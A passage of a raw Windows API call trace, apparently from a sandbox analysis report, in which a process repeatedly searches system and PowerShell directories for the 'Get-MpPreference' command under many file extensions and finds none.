nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0143.272] GetLastError () returned 0x2 [0143.272] SetErrorMode (uMode=0x1) returned 0x1 [0143.272] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.272] GetLastError () returned 0x2 [0143.272] SetErrorMode (uMode=0x1) returned 0x1 [0143.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.272] GetLastError () returned 0x2 [0143.272] SetErrorMode (uMode=0x1) returned 0x1 [0143.273] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.ps1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.273] GetLastError () returned 0x2 [0143.273] SetErrorMode (uMode=0x1) returned 0x1 [0143.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.273] GetLastError () returned 0x2 [0143.273] SetErrorMode (uMode=0x1) returned 0x1 [0143.273] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.psm1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.273] GetLastError () returned 0x2 [0143.273] SetErrorMode (uMode=0x1) returned 0x1 [0143.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.273] GetLastError () returned 0x2 [0143.273] SetErrorMode (uMode=0x1) returned 0x1 [0143.274] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.psd1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.274] GetLastError () returned 0x2 [0143.274] SetErrorMode (uMode=0x1) returned 0x1 [0143.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.274] GetLastError () returned 0x2 [0143.274] SetErrorMode (uMode=0x1) returned 0x1 [0143.274] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.COM", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.274] GetLastError () returned 0x2 [0143.274] SetErrorMode (uMode=0x1) returned 0x1 [0143.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.274] GetLastError () returned 0x2 [0143.274] SetErrorMode (uMode=0x1) returned 0x1 [0143.274] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.EXE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.275] GetLastError () returned 0x2 [0143.275] SetErrorMode (uMode=0x1) returned 0x1 [0143.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.275] GetLastError () returned 0x2 [0143.275] SetErrorMode (uMode=0x1) returned 0x1 [0143.275] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.BAT", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.275] GetLastError () returned 0x2 [0143.275] SetErrorMode (uMode=0x1) returned 0x1 [0143.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.275] GetLastError () returned 0x2 [0143.275] SetErrorMode (uMode=0x1) returned 0x1 [0143.275] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.CMD", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.275] GetLastError () returned 0x2 [0143.275] SetErrorMode (uMode=0x1) returned 0x1 [0143.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.276] GetLastError () returned 0x2 [0143.276] SetErrorMode (uMode=0x1) returned 0x1 [0143.276] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.VBS", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.276] GetLastError () returned 0x2 [0143.276] SetErrorMode (uMode=0x1) returned 0x1 [0143.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.276] GetLastError () returned 0x2 [0143.276] SetErrorMode (uMode=0x1) returned 0x1 [0143.276] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.VBE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.276] GetLastError () returned 0x2 [0143.276] SetErrorMode (uMode=0x1) returned 0x1 [0143.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.276] GetLastError () returned 0x2 [0143.276] SetErrorMode (uMode=0x1) returned 0x1 [0143.277] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.JS", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.277] GetLastError () returned 0x2 [0143.277] SetErrorMode (uMode=0x1) returned 0x1 [0143.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.277] GetLastError () returned 0x2 [0143.277] SetErrorMode (uMode=0x1) returned 0x1 [0143.277] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.JSE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.277] GetLastError () returned 0x2 [0143.277] SetErrorMode (uMode=0x1) returned 0x1 [0143.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.277] GetLastError () returned 0x2 [0143.277] SetErrorMode (uMode=0x1) returned 0x1 [0143.277] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.WSF", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.277] GetLastError () returned 0x2 [0143.278] SetErrorMode (uMode=0x1) returned 0x1 [0143.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.278] GetLastError () returned 0x2 [0143.278] SetErrorMode (uMode=0x1) returned 0x1 [0143.278] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.WSH", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.278] GetLastError () returned 0x2 [0143.278] SetErrorMode (uMode=0x1) returned 0x1 [0143.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.278] GetLastError () returned 0x2 [0143.278] SetErrorMode (uMode=0x1) returned 0x1 [0143.278] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.MSC", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.278] GetLastError () returned 0x2 [0143.278] SetErrorMode (uMode=0x1) returned 0x1 [0143.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0143.279] GetLastError () returned 0x2 [0143.279] SetErrorMode (uMode=0x1) returned 0x1 [0143.279] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.279] GetLastError () returned 0x2 [0143.279] SetErrorMode (uMode=0x1) returned 0x1 [0143.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.279] GetLastError () returned 0x2 [0143.279] SetErrorMode (uMode=0x1) returned 0x1 [0143.279] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.ps1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.279] GetLastError () returned 0x2 [0143.279] SetErrorMode (uMode=0x1) returned 0x1 [0143.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.279] GetLastError () returned 0x2 [0143.279] SetErrorMode (uMode=0x1) returned 0x1 [0143.280] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.psm1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.280] GetLastError () returned 0x2 [0143.280] SetErrorMode (uMode=0x1) returned 0x1 [0143.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.280] GetLastError () returned 0x2 [0143.280] SetErrorMode (uMode=0x1) returned 0x1 [0143.280] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.psd1", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.280] GetLastError () returned 0x2 [0143.280] SetErrorMode (uMode=0x1) returned 0x1 [0143.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.280] GetLastError () returned 0x2 [0143.280] SetErrorMode (uMode=0x1) returned 0x1 [0143.280] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.COM", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.281] GetLastError () returned 0x2 [0143.281] SetErrorMode (uMode=0x1) returned 0x1 [0143.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.281] GetLastError () returned 0x2 [0143.281] SetErrorMode (uMode=0x1) returned 0x1 [0143.281] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.EXE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.281] GetLastError () returned 0x2 [0143.281] SetErrorMode (uMode=0x1) returned 0x1 [0143.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.281] GetLastError () returned 0x2 [0143.281] SetErrorMode (uMode=0x1) returned 0x1 [0143.281] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.BAT", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.281] GetLastError () returned 0x2 [0143.281] SetErrorMode (uMode=0x1) returned 0x1 [0143.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.282] GetLastError () returned 0x2 [0143.282] SetErrorMode (uMode=0x1) returned 0x1 [0143.282] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.CMD", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.282] GetLastError () returned 0x2 [0143.282] SetErrorMode (uMode=0x1) returned 0x1 [0143.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.282] GetLastError () returned 0x2 [0143.282] SetErrorMode (uMode=0x1) returned 0x1 [0143.282] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.VBS", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.282] GetLastError () returned 0x2 [0143.282] SetErrorMode (uMode=0x1) returned 0x1 [0143.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.282] GetLastError () returned 0x2 [0143.282] SetErrorMode (uMode=0x1) returned 0x1 [0143.283] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.VBE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.283] GetLastError () returned 0x2 [0143.283] SetErrorMode (uMode=0x1) returned 0x1 [0143.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.283] GetLastError () returned 0x2 [0143.283] SetErrorMode (uMode=0x1) returned 0x1 [0143.283] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.JS", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.283] GetLastError () returned 0x2 [0143.283] SetErrorMode (uMode=0x1) returned 0x1 [0143.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.283] GetLastError () returned 0x2 [0143.283] SetErrorMode (uMode=0x1) returned 0x1 [0143.283] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.JSE", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.284] GetLastError () returned 0x2 [0143.284] SetErrorMode (uMode=0x1) returned 0x1 [0143.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.284] GetLastError () returned 0x2 [0143.284] SetErrorMode (uMode=0x1) returned 0x1 [0143.284] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.WSF", lpFindFileData=0x3545a8 | out: 